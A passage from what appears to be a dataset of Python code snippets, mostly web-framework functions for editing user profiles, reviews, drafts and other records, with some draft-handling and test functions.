return(command)", "def edit_user(request, userid):\n if request.method == 'POST':\n form = UserDetailsForm(request.POST)\n if form.is_valid():\n # we're going to update the first_name, last_name, and email fields of this object\n user = request.user\n user.first_name = form.cleaned_data['first_name']\n user.last_name = form.cleaned_data['last_name']\n user.email = form.cleaned_data['email']\n user.save()\n return HttpResponseRedirect(reverse('view-profile', args=[userid]))\n else:\n form = UserDetailsForm(instance=request.user)\n\n return render(request, 'woofer/show_form.html', {\n 'form' : form,\n 
'message' : None,\n 'form_action' : reverse('edit-user', args=[userid]),\n 'title' : \"Edit Account\"\n })", "def process_user_edit_form(user_id):\n first_name = request.form.get('first_name')\n last_name = request.form.get('last_name')\n image_url = request.form.get('image_url')\n\n # can add value in edit_user.html to remove this\n user = User.query.get_or_404(user_id)\n\n user.first_name = first_name\n user.last_name = last_name\n user.image_url = image_url\n\n db.session.add(user)\n db.session.commit()\n\n flash(f'Edited user info for: {first_name} {last_name}')\n\n return redirect('/users')", "def edit_user(request, user_id):\n profile = get_object_or_404(UserProfile, user=request.user)\n\n # make sure only managers and admins can add a team\n if profile.level == 'admin' or profile.level == 'manager':\n\n user = get_object_or_404(UserProfile, pk=user_id)\n if request.method == 'POST':\n form = UserProfileForm(request.POST, request.FILES, instance=user)\n if form.is_valid():\n form.save()\n messages.success(request, 'User edited successfully')\n\n users = UserProfile.objects.filter(company_id=profile.company_id)\n template = 'profiles/user_management.html'\n context = {\n 'users': users,\n 'profile': profile\n }\n return render(request, template, context)\n\n else:\n print(\"failed\")\n else:\n form = UserProfileForm(instance=user)\n\n template = 'profiles/profile.html'\n context = {\n 'form': form,\n 'profile': user,\n }\n\n return render(request, template, context)\n\n else:\n messages.info(request, \"Sorry, you are not authorized to edit users. Ask a Manager or Admin.\")\n\n return redirect(reverse('planning', ))", "def user_edit(request):\n\n if request.method != 'POST':\n return HttpResponseNotAllowed(['POST'])\n\n data = json.loads(request.body.decode('utf-8'))\n\n auth_token = str(data.get('auth_token', ''))\n edit_user_info = data.get('edit_user_info', '')\n username = str(edit_user_info.get('username', ''))\n\n try:\n if not verify_admin(auth_token):\n raise PlantalyticsAuthException(ADMIN_INVALID)\n\n message = (\n 'Attempting to edit info for user: {}.'\n ).format(username)\n logger.info(message)\n check_user_parameters(edit_user_info)\n cassy.edit_user(edit_user_info)\n message = (\n 'Successfully edited info for user: {}.'\n ).format(username)\n logger.info(message)\n body = {\n 'errors': {}\n }\n return HttpResponse(\n json.dumps(body),\n content_type='application/json'\n )\n except PlantalyticsException as e:\n message = (\n 'Error attempting to edit user info. 
Error code: {}'\n ).format(str(e))\n logger.warn(message)\n error = custom_error(str(e))\n return HttpResponseForbidden(error, content_type='application/json')\n except Exception as e:\n message = (\n 'Unknown error occurred while attempting to edit user info:'\n )\n logger.exception(message)\n error = custom_error(UNKNOWN, str(e))\n return HttpResponseServerError(error, content_type='application/json')", "def edit_restaurant(restaurant_id):\n user_id = login_session['user_id']\n r = read_restaurants(restaurant_id, user_id)\n if r[1] is True: # Means if user is owner\n if request.method == 'GET':\n return render_template('restaurants/editrestaurant.html',\n restaurant=r[0][0])\n elif request.method == 'POST':\n # Got post request -> First we get the request arguemnts\n name = request.form['name']\n address = request.form['address']\n city = request.form['city']\n state = request.form['state']\n zipCode = request.form['zipCode']\n # Next we do the db edit\n update_restaurant(restaurant_id, name, address,\n city, state, zipCode)\n # Finally we return the success html\n flash(\"Edited your restaurant\")\n return render_template(\"submitted.html\")\n else:\n return \"Invalid http\"\n else:\n flash(\"You need to be the owner of the restaurant to edit\")\n return redirect(url_for('site.show_restaurants',\n restaurant_id=restaurant_id))", "def patch(self, user_id):\n\n data = request.get_json()\n\n res = self._user.update_user(user_id, data)\n\n if res:\n return {\n \"status\": 200,\n \"data\": [{\n \"id\": res[\"id\"],\n \"message\": \"user record has been updated\"\n }]\n }, 200\n else:\n return {\n \"status\": 404,\n \"error\": \"Not found for id {}\".format(user_id)\n }, 404", "def view_user_edit(self):\n\n logged_in = authenticated_userid(self.request)\n message = ''\n form = Form(self.request, schema=UserEditSchema,\n state=State(request=self.request))\n if form.validate():\n password = self.request.params['password']\n if self.context.validate_password(password):\n if self.request.params['new_password']:\n password = self.request.params['new_password']\n message = 'Successfully saved'\n email = self.request.params['email']\n self.context.edit(password, email)\n else:\n message = msg['password_invalid']\n return {\n 'message': message,\n 'project': '',\n 'username': self.context.username,\n 'logged_in': logged_in,\n 'form': FormRenderer(form),\n 'email': self.context.email\n }", "def update_draft(self, identity, data=None, record=None, **kwargs):\n record.metadata = data.get('metadata', {})", "def edit_widget():\n\n user_id = session.get('user_id')\n user_email = session.get('user_email')\n\n user = db_users.find_by_email(user_email)\n\n if user is None:\n log.error('widget.py::edit_widget', 'ERROR: invalid state - no user record for user_email: ' + user_email)\n flash('Please sign in. If you are not already a user, please sign up.')\n return redirect(url_for('home.index'))\n\n widget_id = request.args.get('widget_id')\n\n if widget_id is None:\n\n log.error('widget.py::edit_widget',\n 'ERROR: invalid state - no widget_id in request. user_id [' + user_id + ']')\n\n flash('Oops! Something went sideways. We have been notified of the problem. 
Carry on.')\n return redirect(url_for('widget.my_widgets'))\n\n log.debug('widget.py::edit_widget', 'widget_id [' + widget_id + ']')\n\n widget_to_edit: Optional[Dict[Any, Any]] = db_widgets.find_by_id(widget_id)\n\n if widget_to_edit is None:\n\n log.error('widget.py::edit_widget',\n 'ERROR: invalid state - no widget record for widget_id [' + widget_id + ']')\n\n flash('Oops! Something went sideways. We have been notified of the problem. Carry on.')\n return redirect(url_for('widget.my_widgets'))\n\n return render_template('edit_widget.html', widget=widget_to_edit)", "def review_modify_handler(review_id, user):\n def fetch_params():\n text = Parser.string('json', 'text', min=25, max=2500)\n return text\n review = Review.query.get_or_404(str(review_id))\n if review.is_archived is True:\n raise NotFound\n if review.user_id != user.id:\n raise AccessDenied\n text = fetch_params()\n review.update(text=text)\n return jsonify(message='Request processed successfully',\n review=dict(id=review.id))", "def edit_review(review_id):\n form = EditReviewForm()\n try:\n review = Review.from_mongo(**mongo.db.reviews.find_one({\"_id\": ObjectId(review_id)}))\n except Exception as e:\n raise Exception(e)\n else:\n game = Game.from_mongo(**mongo.db.games.find_one({\"_id\": ObjectId(str(review.game_id))}))\n user_name = session.get('username')\n if user_name == review.author_ref['author_name']:\n user = User.from_mongo(**mongo.db.users.find_one({\"name\": user_name}))\n\n if form.validate_on_submit():\n review.name = form.title.data\n review.text = form.review_text.data\n review_ref = review.create_review_ref()\n review.update_review()\n for game_review in game.reviews:\n if game_review.get('review_pub_date') == review.pub_date:\n game.reviews.remove(game_review)\n game.reviews.append(review_ref)\n game.update_game()\n for user_review in user.reviews:\n if user_review.get('review_pub_date') == review.pub_date:\n user.reviews.remove(user_review)\n user.reviews.append(review_ref)\n user.update_user()\n return redirect(url_for('review', review_id=review_id))\n\n elif request.method == \"GET\":\n form.title.data = review.name\n form.review_text.data = review.text\n\n return render_template('edit_review.html.jinja',\n title='Edit Review',\n review_id=review_id,\n form=form\n )", "def update_user(user_id):\n netAdminToolDB = app.config['DATABASE']\n user = netAdminToolDB.get_user(user_id)\n if user == None:\n return jsonify({'error': 'User_id not found'}), 404\n\n input = request.get_json()\n\n if input == None:\n return jsonfiy({'error': 'Invalid PUT request'}), 400\n\n # Send input directly to update_user function, which checks each key\n netAdminToolDB.update_user(user_id, **input)\n user = netAdminToolDB.get_user(user_id)\n userDict = dict(user)\n uri = url_for('get_user', user_id=user.id, _external=True)\n userDict['uri'] = uri\n\n return jsonify({'user': userDict}), 200", "def update_user_data(payload, user_id):\n user = User.query.get(user_id)\n # exception for non existing id\n if user is None:\n abort(404)\n # set error status\n error = False\n # get posted data from json request\n body = request.get_json()\n # update user data\n keys = body.keys()\n try:\n if 'e_mail' in keys:\n user.e_mail = body['e_mail']\n if 'address' in keys:\n user.address = body['address']\n if 'auth0_id' in keys:\n user.auth0_id = body['auth0_id']\n if 'role' in keys:\n user.role = body['role']\n user.update()\n formatted_user = user.format()\n except Exception:\n user.rollback()\n error = True\n print(sys.exc_info())\n finally:\n 
user.close_session()\n\n if error:\n abort(422)\n\n return jsonify({\n 'success': True,\n 'user': formatted_user\n })", "def edit_board(action, user):\n userprofile = user.get_profile()\n \n try:\n board = userprofile.get_board(action['boardId'])\n editable_attributes = ('title', )\n \n for key, value in action['what'].iteritems():\n if key == 'id': continue\n elif key in editable_attributes:\n board.__setattr__(key, value)\n \n userprofile.save()\n except Board.DoesNotExist:\n return", "def user_can_edit(self, user):\n return user == self.owner", "def get(self, oauth, resource_id, draft_id):\n d = Deposition.get(resource_id, user=current_user)\n return d.type.marshal_draft(d.get_draft(draft_id))", "def fusion_api_edit_user(self, body, uri, api=None, headers=None):\n return self.user.update(body, uri, api, headers)", "def _inline_draft(request):\n # TODO(guido): turn asserts marked with XXX into errors\n # Don't use @login_required, since the JS doesn't understand redirects.\n if not request.user:\n # Don't log this, spammers have started abusing this.\n return HttpTextResponse('Not logged in')\n snapshot = request.POST.get('snapshot')\n assert snapshot in ('old', 'new'), repr(snapshot)\n left = (snapshot == 'old')\n side = request.POST.get('side')\n assert side in ('a', 'b'), repr(side) # Display left (a) or right (b)\n issue_id = int(request.POST['issue'])\n issue = models.Issue.get_by_id(issue_id)\n assert issue # XXX\n patchset_id = int(request.POST.get('patchset') or\n request.POST[side == 'a' and 'ps_left' or 'ps_right'])\n patchset = models.PatchSet.get_by_id(int(patchset_id), parent=issue.key)\n assert patchset # XXX\n patch_id = int(request.POST.get('patch') or\n request.POST[side == 'a' and 'patch_left' or 'patch_right'])\n patch = models.Patch.get_by_id(int(patch_id), parent=patchset.key)\n assert patch # XXX\n text = request.POST.get('text')\n lineno = int(request.POST['lineno'])\n message_id = request.POST.get('message_id')\n comment = _add_or_update_comment(user=request.user, issue=issue, patch=patch,\n lineno=lineno, left=left,\n text=text, message_id=message_id)\n issue.calculate_draft_count_by_user()\n issue_fut = issue.put_async()\n\n query = models.Comment.query(\n models.Comment.patch_key == patch.key, models.Comment.lineno == lineno,\n models.Comment.left == left).order(models.Comment.date)\n comments = list(c for c in query if not c.draft or c.author == request.user)\n if comment is not None and comment.author is None:\n # Show anonymous draft even though we don't save it\n comments.append(comment)\n issue_fut.get_result()\n if not comments:\n return HttpTextResponse(' ')\n for c in comments:\n c.complete()\n return render_to_response('inline_comment.html',\n {'user': request.user,\n 'patch': patch,\n 'patchset': patchset,\n 'issue': issue,\n 'comments': comments,\n 'lineno': lineno,\n 'snapshot': snapshot,\n 'side': side,\n },\n context_instance=RequestContext(request))", "def edit_user_profile(user_id):\n if CURRENT_USER_KEY not in session or session[CURRENT_USER_KEY] != user_id:\n raise Unauthorized()\n\n user = User.query.get_or_404(user_id)\n\n form = UserEditForm(obj=user)\n\n if form.validate_on_submit():\n try:\n user.email = form.email.data\n user.username = form.username.data\n user.first_name = form.first_name.data.capitalize()\n user.last_name = form.last_name.data.capitalize()\n user.image_url = form.image_url.data or User.image_url.default.arg\n user.cover_url = form.cover_url.data or User.cover_url.default.arg\n user.bio = form.bio.data\n\n 
db.session.commit()\n except IntegrityError:\n db.session.rollback()\n flash(\n \"Email or Username already taken!! Please try again\", 'danger')\n return render_template('edit_profile.html', form=form, user=user, img_src=user.image_url)\n\n flash('Profile Successfully Updated!', 'success')\n return redirect(url_for('show_user_profile', user_id=user.id))\n return render_template('edit_profile.html', form=form, user=user, img_src=user.image_url)", "def editSport(sport_id):\n\n editedSport = session.query(Sport).filter_by(id=sport_id).one()\n if request.method == 'POST':\n if request.form['sportName']:\n editedSport.sportName = request.form['sportName']\n editedSport.user_id = login_session['user_id']\n session.add(editedSport)\n session.commit()\n return redirect(url_for('showSports'))\n else:\n return render_template('editsport.html', sport=editedSport)", "def can_user_edit(self, user):\n\n return user.is_authenticated and (\n user.has_role('admin') or\n unicode(self.user_id) == user.get_id()\n )", "def put(self, user, recipe_id):\n data = request.json\n return update_recipe(data=data, user=user, recipe_id=recipe_id)", "def update_item(self, id: str, user: User, **kwargs) -> None:", "def internal_edit_user(\n payload: dict,\n raiseonfail: bool = False,\n override_authdb_path: str = None,\n config: SimpleNamespace = None,\n) -> dict:\n\n engine, meta, permjson, dbpath = get_procdb_permjson(\n override_authdb_path=override_authdb_path,\n override_permissions_json=None,\n raiseonfail=raiseonfail,\n )\n\n for key in (\"reqid\", \"pii_salt\"):\n if key not in payload:\n LOGGER.error(\n \"Missing %s in payload dict. Can't process this request.\" % key\n )\n return {\n \"failure_reason\": (\n \"invalid request: missing '%s' in request\" % key\n ),\n \"success\": False,\n \"session_token\": None,\n \"expires\": None,\n \"messages\": [\"Invalid edit-user request.\"],\n }\n\n for key in (\"target_userid\", \"update_dict\"):\n\n if key not in payload:\n\n LOGGER.error(\n \"[%s] Invalid session edit-user request, missing %s.\"\n % (payload[\"reqid\"], key)\n )\n\n return {\n \"success\": False,\n \"failure_reason\": (\n \"invalid request: missing '%s' in request\" % key\n ),\n \"messages\": [\n \"Invalid edit-user request: \"\n \"missing or invalid parameters.\"\n ],\n }\n\n target_userid = payload[\"target_userid\"]\n update_dict = payload[\"update_dict\"]\n if update_dict is None or len(update_dict) == 0:\n return {\n \"success\": False,\n \"failure_reason\": (\n \"invalid request: missing 'update_dict' in request\"\n ),\n \"messages\": [\n \"Invalid user-edit request: \" \"missing or invalid parameters.\"\n ],\n }\n\n update_dict_keys = set(update_dict.keys())\n disallowed_keys = {\n \"user_id\",\n \"system_id\",\n \"password\",\n \"emailverify_sent_datetime\",\n \"emailforgotpass_sent_datetime\",\n \"emailchangepass_sent_datetime\",\n \"last_login_success\",\n \"last_login_try\",\n \"failed_login_tries\",\n \"created_on\",\n \"last_updated\",\n }\n leftover_keys = update_dict_keys.intersection(disallowed_keys)\n\n if len(leftover_keys) > 0:\n LOGGER.error(\n \"[%s] Invalid edit-user request, \"\n \"found disallowed update keys in update_dict: %s.\"\n % (payload[\"reqid\"], leftover_keys)\n )\n return {\n \"success\": False,\n \"failure_reason\": (\n \"invalid request: disallowed keys in update_dict: %s\"\n % leftover_keys\n ),\n \"messages\": [\n \"Invalid edit-user request: \" \"invalid update parameters.\"\n ],\n }\n\n #\n # now, try to update\n #\n try:\n\n users = meta.tables[\"users\"]\n\n 
sel = (\n select(users.c.user_id, users.c.extra_info)\n .select_from(users)\n .where(users.c.user_id == target_userid)\n )\n\n with engine.begin() as conn:\n result = conn.execute(sel)\n userid_and_extrainfo = result.first()\n\n if not userid_and_extrainfo or len(userid_and_extrainfo) == 0:\n return {\n \"success\": False,\n \"failure_reason\": \"no such user\",\n \"messages\": [\"User info update failed.\"],\n }\n\n if (\n \"extra_info\" in update_dict\n and update_dict[\"extra_info\"] is not None\n ):\n\n user_extra_info = userid_and_extrainfo.extra_info\n if not user_extra_info:\n user_extra_info = {}\n\n for key, val in update_dict[\"extra_info\"].items():\n if val == \"__delete__\" and key in user_extra_info:\n del user_extra_info[key]\n else:\n user_extra_info[key] = val\n\n else:\n user_extra_info = userid_and_extrainfo.extra_info\n\n # do the update\n\n # replace the extra_info key in the update_dict since we update that\n # separately\n update_dict[\"extra_info\"] = user_extra_info\n\n with engine.begin() as conn:\n upd = (\n users.update()\n .where(\n users.c.user_id == target_userid,\n )\n .values(update_dict)\n )\n conn.execute(upd)\n\n s = (\n select(*user_info_columns(users))\n .select_from(users)\n .where(users.c.user_id == target_userid)\n )\n\n result = conn.execute(s)\n row = result.first()\n\n try:\n\n serialized_result = dict(row._mapping)\n LOGGER.info(\n \"[%s] User info updated for \"\n \"user_id: %s.\"\n % (\n payload[\"reqid\"],\n pii_hash(\n serialized_result[\"user_id\"], payload[\"pii_salt\"]\n ),\n )\n )\n\n return {\n \"success\": True,\n \"user_info\": serialized_result,\n \"messages\": [\"User-info update successful.\"],\n }\n\n except Exception as e:\n\n LOGGER.error(\n \"[%s] User info update failed for session token: %s. \"\n \"Exception was: %r.\"\n % (\n payload[\"reqid\"],\n pii_hash(payload[\"target_userid\"], payload[\"pii_salt\"]),\n e,\n )\n )\n\n return {\n \"success\": False,\n \"failure_reason\": \"user requested for update doesn't exist\",\n \"messages\": [\"User info update failed.\"],\n }\n\n except Exception as e:\n\n LOGGER.error(\n \"[%s] User info update failed for user_id: %s. 
\"\n \"Exception was: %r.\"\n % (\n payload[\"reqid\"],\n pii_hash(payload[\"target_userid\"], payload[\"pii_salt\"]),\n e,\n )\n )\n\n return {\n \"success\": False,\n \"failure_reason\": \"DB error when updating user info\",\n \"messages\": [\"User info update failed.\"],\n }", "def test_save_draft():\n with open(basedir + \"fixture/7149593_formatted.json\", \"r\") as f:\n storage.save_draft(user_id, \"bib\", \"7149593\", f.read(), \"1362044230872\")\n with open(basedir + \"some/path/\" + user_id + \"/bib/7149593\", \"r\") as f:\n json_data = json.loads(f.read())\n assert json_data['document']['@id'].rsplit(\"/\",1)[1] == '7149593'\n assert json_data['etag'] == \"1362044230872\"", "def can_be_edited(self, user):\n return (self.is_public or user == self.owner or\n user in list(self.auth_users.all()))", "def update_draft(self, kav_id, html):\n kav_api = getattr(self.api, settings.SALESFORCE_ARTICLE_TYPE)\n data = html.create_article_data()\n result = kav_api.update(kav_id, data)\n if result != HTTPStatus.NO_CONTENT:\n raise SalesforceError((\n 'Error updating draft KnowledgeArticleVersion (ID={})'\n ).format(kav_id))\n return result", "def edit_user(user_id):\n if request.method == 'GET':\n # init form with current user:\n form = ProfileForm(\n nickname = session[Session.PROFILE][\"nickname\"], \n location = session[Session.PROFILE][\"location\"],\n about_me = session[Session.PROFILE][\"about_me\"]\n )\n if request.method == 'POST': \n # init form with POSTed form:\n form = ProfileForm(request.form)\n\n if form.validate(): \n # update backend:\n response = service_user_management.patch(\n id = f'auth0|{user_id}', \n nickname = form.nickname.data, \n location = form.location.data,\n about_me = form.about_me.data\n )\n\n # success:\n if 'identities' in response: \n try:\n # update db:\n delegated_user = DelegatedUser.query.get_or_404(\n user_id, \n description='There is no user with id={}'.format(user_id)\n )\n delegated_user.nickname = form.nickname.data\n # update:\n db.session.add(delegated_user)\n # write\n db.session.commit()\n\n # update session:\n session[Session.PROFILE][\"nickname\"] = form.nickname.data\n session[Session.PROFILE][\"location\"] = form.location.data\n session[Session.PROFILE][\"about_me\"] = form.about_me.data\n \n # on successful profile update, flash success\n flash('Your profile was successfully updated.')\n\n return redirect(url_for('.show_user', user_id = user_id))\n except:\n db.session.rollback()\n # on unsuccessful registration, flash an error instead.\n flash('An error occurred. 
New account could not be created.')\n finally:\n db.session.close()\n # failure:\n else:\n flash(response['message']) \n else:\n # for debugging only:\n flash(form.errors)\n \n return render_template('users/forms/user.html', form=form, user_id=user_id)", "def draft_message(request):\n query = models.Message.query(\n models.Message.issue_key == request.issue.key,\n models.Message.sender == request.user.email(),\n models.Message.draft == True)\n if query.count() == 0:\n draft_message = None\n else:\n draft_message = query.get()\n if request.method == 'GET':\n return _get_draft_message(draft_message)\n elif request.method == 'POST':\n return _post_draft_message(request, draft_message)\n elif request.method == 'DELETE':\n return _delete_draft_message(draft_message)\n return HttpTextResponse('An error occurred.', status=500)", "def user_edit(user_id):\n\n if not g.user:\n return _get_json_message(\n INVALID_CREDENTIALS_MSG,\n INVALID_CREDENTIALS_STATUS_CODE)\n\n current_user = User.query.get_or_404(user_id)\n received = request.form\n file = request.files.get(\"image_url\")\n form = UserEditForm(csrf_enabled=False, data=received)\n\n if form.validate_on_submit():\n if not User.authenticate(g.user.username, form.password.data):\n return _get_json_message(\n \"unable-to-update-user\",\n INVALID_CREDENTIALS_STATUS_CODE)\n\n try:\n # update non image_url fields\n current_user.email = form.email.data\n current_user.first_name = form.first_name.data,\n current_user.last_name = form.last_name.data,\n current_user.hobbies = form.hobbies.data,\n current_user.interests = form.interests.data,\n current_user.zip_code = form.zip_code.data,\n current_user.friend_radius_miles = form.friend_radius_miles.data\n\n current_user.coordinates = User.get_coords(form.zip_code.data)\n\n # update image_url with uploaded file\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n url = upload_file_obj(file, S3_BUCKET, filename)\n\n current_user.image_url = url\n\n db.session.commit()\n\n return jsonify(user=current_user.serialize())\n except ClientError as e:\n print(e)\n return _get_json_message(\n \"image-upload-failed\",\n INVALID_CREDENTIALS_STATUS_CODE)\n\n return _get_json_message(\n \"unable-to-update-user\",\n INVALID_CREDENTIALS_STATUS_CODE)", "def edit(id):\n r = requests.get(API_ROUTE + '/' + str(id), headers={'Auth': _auth()})\n if r.status_code != requests.codes.ok:\n return r.text, r.status_code\n\n return render_template('editor.html', article=r.json())", "def update_review(review_id):\n user_input = request.get_json()\n if user_input is None:\n abort(400, {'message': 'Not a JSON'})\n obj = storage.get(Review, review_id)\n if obj is None:\n abort(404)\n for k, v in user_input.items():\n if k not in ['id', 'user_id', 'place_id',\n 'created_at', 'updated_at']:\n setattr(obj, k, v)\n obj.save()\n return jsonify(obj.to_dict()), 200", "def test_create_draft_with_update(self):\r\n # Make problem public.\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={'publish': 'make_public'}\r\n )\r\n self.assertIsNotNone(self.get_item_from_modulestore(self.problem_usage_key, False))\r\n # Now make it draft, which means both versions will exist.\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={\r\n 'metadata': {'due': '2077-10-10T04:00Z'},\r\n 'publish': 'create_draft'\r\n }\r\n )\r\n published = self.get_item_from_modulestore(self.problem_usage_key, False)\r\n self.assertIsNone(published.due)\r\n draft = self.get_item_from_modulestore(self.problem_usage_key, 
True)\r\n self.assertEqual(draft.due, datetime(2077, 10, 10, 4, 0, tzinfo=UTC))", "def edit_user():\n userid = request.form[\"userid\"]\n email = request.form[\"email\"]\n fname = request.form[\"fname\"]\n lname = request.form[\"lname\"]\n macaddress = request.form[\"macaddress\"]\n role = request.form[\"role\"]\n\n print(userid, \" | \",email,\" | \", fname,\" | \", lname, \" | \",macaddress,\" | \", role)\n\n user = User.query.get(userid)\n user.email = email\n user.fname = fname\n user.lname = lname\n user.macaddress = macaddress\n user.role = role\n\n # commit the new add.\n db.session.commit()\n\n return userSchema.jsonify(user)", "def blogEdit(request, urlname):\n\tblog = Blog.objects.get(authors=request.user, urlname=urlname)\n\tsections = [(s.pk, s.name) for s in blog.blogsection_set.all()]\n\teditor = request.user in blog.editors.all()\n\tif request.method == 'POST':\n\t\tform = BlogForm(request.POST, sections=sections)\n\t\tif form.is_valid():\n\t\t\tdata = form.cleaned_data\n\t\t\tif data['urlname']:\n\t\t\t\tpost = BlogEntry.qa_objects.get(blog=blog, urlname=data['urlname'])\n\t\t\t\tpost.title = data['title']\n\t\t\t\tpost.byline = data['byline']\n\t\t\t\tpost.byline_link = data['byline_link']\n\t\t\t\tpost.reviewed_by = data['reviewed_by']\n\t\t\t\tpost.reviewed_by_link = data['reviewed_by_link']\n\t\t\t\tpost.body = data['body']\n\t\t\t\tfor section in data['sections']:\n\t\t\t\t\tsection_model = BlogSection.objects.get(pk=section)\n\t\t\t\t\texisting = BlogEntrySection.qa_objects.filter(entry=post, section=section_model)\n\t\t\t\t\tif not existing:\n\t\t\t\t\t\tnew = BlogEntrySection(entry=post, section=section_model)\n\t\t\t\t\t\tpost.blogentrysection_set.add(new)\n\t\t\telse:\n\t\t\t\tpost = BlogEntry(for_update=2, blog=blog, urlname=None, author=request.user, title=data['title'], posting_time=data['posting_time'], display_time=data['display_time'], byline=data['byline'], byline_link=data['byline_link'], reviewed_by=data['reviewed_by'], reviewed_by_link=data['reviewed_by_link'], body=data['body'])\n\t\t\tpost.save()\n\t\t\treturn render_to_response('blogs/admin/blog_admin.html', {'user': request.user, 'editor': editor, 'blog': blog}, context_instance=RequestContext(request))\n\t\telse:\n\t\t\treturn render_to_response('blogs/admin/blog_edit.html', {'form': form, 'user': request.user, 'editor': editor, 'blog': blog}, context_instance=RequestContext(request))\n\telse:\n\t\tif request.GET.get('entry'):\n\t\t\tentry = request.GET['entry']\n\t\t\tpost = BlogEntry.qa_objects.get(blog=blog, urlname=entry)\n\t\t\tinitial_sections = [s.pk for s in post.blogentrysection_set.all()]\n\t\t\tform = BlogForm(sections=sections, initial={'posting_time': post.posting_time, 'display_time': post.display_time, 'urlname': entry, 'title': post.title, 'byline': post.byline, 'byline_link': post.byline_link, 'reviewed_by': post.reviewed_by, 'reviewed_by_link': post.reviewed_by_link, 'body': post.body, 'sections': initial_sections})\n\t\telse:\n\t\t\tform = BlogForm(sections=sections)\n\t\treturn render_to_response('blogs/admin/blog_edit.html', {'form': form, 'user': request.user, 'editor': editor, 'blog': blog}, context_instance=RequestContext(request))", "def get(self,\n draft_id,\n ):\n return self._invoke('get',\n {\n 'draft_id': draft_id,\n })", "def update(self, user_id, first_name=None, last_name=None, email=None, title=None,\n dept=None, notes=None, admin_role=None, app_role=None, email_notification=None):\n\n url = \"{0}/users/{1}\".format(self.base_url, user_id)\n url = 
self._add_token_to_url(url)\n payload = self.get(user_id)\n\n # get rid of fields that aren't required for PUT\n pop_fields = ['complete_json',\n 'entity_type',\n 'id',\n 'image',\n 'is_deleted',\n 'tags',\n 'username']\n for field in pop_fields:\n payload.pop(field)\n\n # replace fields with updated ones from kwargs\n if first_name:\n payload[\"first_name\"] = first_name\n if last_name:\n payload[\"last_name\"] = last_name\n if email:\n payload[\"email\"] = email\n if title:\n payload[\"title\"] = title\n if dept:\n payload[\"dept\"] = dept\n if notes:\n payload[\"notes\"] = notes\n if app_role:\n payload[\"user_type\"] = app_role\n if email_notification is not None:\n payload[\"subscribed_to_emails\"] = email_notification\n\n # Logic for setting admin status is slightly more complicated:\n if admin_role is None:\n pass\n elif admin_role == \"app_admin\":\n payload[\"admin\"] = True\n payload[\"roles\"] = \"\"\n elif admin_role == \"data_admin\":\n payload[\"admin\"] = False\n payload[\"roles\"] = \"data_admin\"\n else:\n payload[\"admin\"] = False\n payload[\"roles\"] = \"\"\n\n self.logger.debug(\"Sending the user information {0} to {1}\".format(json.dumps(payload), url))\n self.session.headers.update({\"Content-Type\": \"application/json\"}) # Set special header for this post\n response = self.session.put(url, data=json.dumps(payload), verify=False)\n self.logger.debug(\"Received response code {0} with reason {1}...\".format(response.status_code, response.reason))\n self.session.headers.pop(\"Content-Type\") # Remove header, as it affects other tests\n return response.json()['response']", "def update_drafts(self, issue, have_drafts=None):\n dirty = False\n if self._drafts is None:\n dirty = self._initialize_drafts()\n id = issue.key().id()\n if have_drafts is None:\n have_drafts = bool(issue.num_drafts) # Beware, this may do a query.\n if have_drafts:\n if id not in self._drafts:\n self._drafts.append(id)\n dirty = True\n else:\n if id in self._drafts:\n self._drafts.remove(id)\n dirty = True\n if dirty:\n self._save_drafts()", "def edit(self, instance_id, userdata=None, hostname=None, domain=None,\r\n notes=None):\r\n\r\n obj = {}\r\n if userdata:\r\n self.guest.setUserMetadata([userdata], id=instance_id)\r\n\r\n if hostname:\r\n obj['hostname'] = hostname\r\n\r\n if domain:\r\n obj['domain'] = domain\r\n\r\n if notes:\r\n obj['notes'] = notes\r\n\r\n if not obj:\r\n return True\r\n\r\n return self.guest.editObject(obj, id=instance_id)", "def edit_user(user_id):\n\n user = User.query.get_or_404(user_id)\n \n first = request.form['first_name']\n last = request.form['last_name']\n image = request.form['image_url']\n \n if not first or not last:\n flash(\"Please enter first and last name.\")\n return redirect(f\"/users/{user.id}/edit\")\n \n user.first_name = first\n user.last_name = last\n \n if image:\n user.image_url = image\n\n db.session.add(user)\n db.session.commit()\n\n return redirect(\"/users\")", "def update_user(context, params):\n\n user = User.objects.filter(id=params.get('id')).first()\n if not user:\n raise ValueError(\"user not found\")\n user.language = Language.objects.filter(id=params.get('language_id', None)).first()\n user.deputy = User.objects.filter(id=params.get('deputy_id', None)).first()\n # user.edited_by = context.user\n\n user.save()\n\n update_person(context, user, params)\n\n user.save()\n return user", "def _editSeed(self, request, seed):\n\n # if scope_path is present\n if 'scope_path' in seed.keys():\n # fill the to_user field with the scope path\n 
seed['to_user'] = seed['scope_path']", "def update_user(user_id):\n try:\n # Get the value which needs to be updated\n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n # Bad request as the request body is not available\n # Add message for debugging purpose\n return \"\", 400\n\n # Updating the user\n records_updated = collection.update_one({\"id\": int(user_id)}, body)\n\n # Check if resource is updated\n if records_updated.modified_count > 0:\n # Prepare the response as resource is updated successfully\n return \"\", 200\n else:\n # Bad request as the resource is not available to update\n # Add message for debugging purpose\n return \"\", 404\n except:\n # Error while trying to update the resource\n # Add message for debugging purpose\n return \"\", 500", "def put(self, user_id):\n\n user_data, error = user_schema.load(api.payload['data'])\n\n user = User.objects.get_or_404(public_id=user_id)\n user.update(updated_at=datetime.utcnow, **user_data)\n \n return user_schema.dump(user)", "def edit_post_process(post_id):\n\n # extract form data, commit, then redirect to /users\n f_title = request.form[\"post-title\"].strip()\n f_content = request.form[\"post-content\"].strip()\n\n # msg will also include a field for the user_id for routing.\n msg = db_edit_post(post_id, f_title, f_content)\n\n flash(msg[\"text\"], msg[\"severity\"])\n\n return redirect(f\"/users/{msg['user_id']}\")", "def edit(self):\n if not self.context.model.is_editable():\n raise Unauthorized(\"Editing is not allowed\")\n\n title = self.request.get('title')\n if not title:\n return JSONResponse(self.request).error(\n _('agenda_item_update_empty_string',\n default=u\"Agenda Item title must not be empty.\")).proceed().dump()\n\n title = title.decode('utf-8')\n if self.agenda_item.has_proposal:\n if len(title) > ISubmittedProposal['title'].max_length:\n return JSONResponse(self.request).error(\n _('agenda_item_update_too_long_title',\n default=u\"Agenda Item title is too long.\")\n ).proceed().dump()\n\n self.agenda_item.set_title(title)\n return JSONResponse(self.request).info(\n _('agenda_item_updated',\n default=u\"Agenda Item updated.\")).proceed().dump()", "def do_edit(self, args):\n member = None\n rowid = args.split(' ')[0]\n \n # loop till we get a rowid which matches a member in the 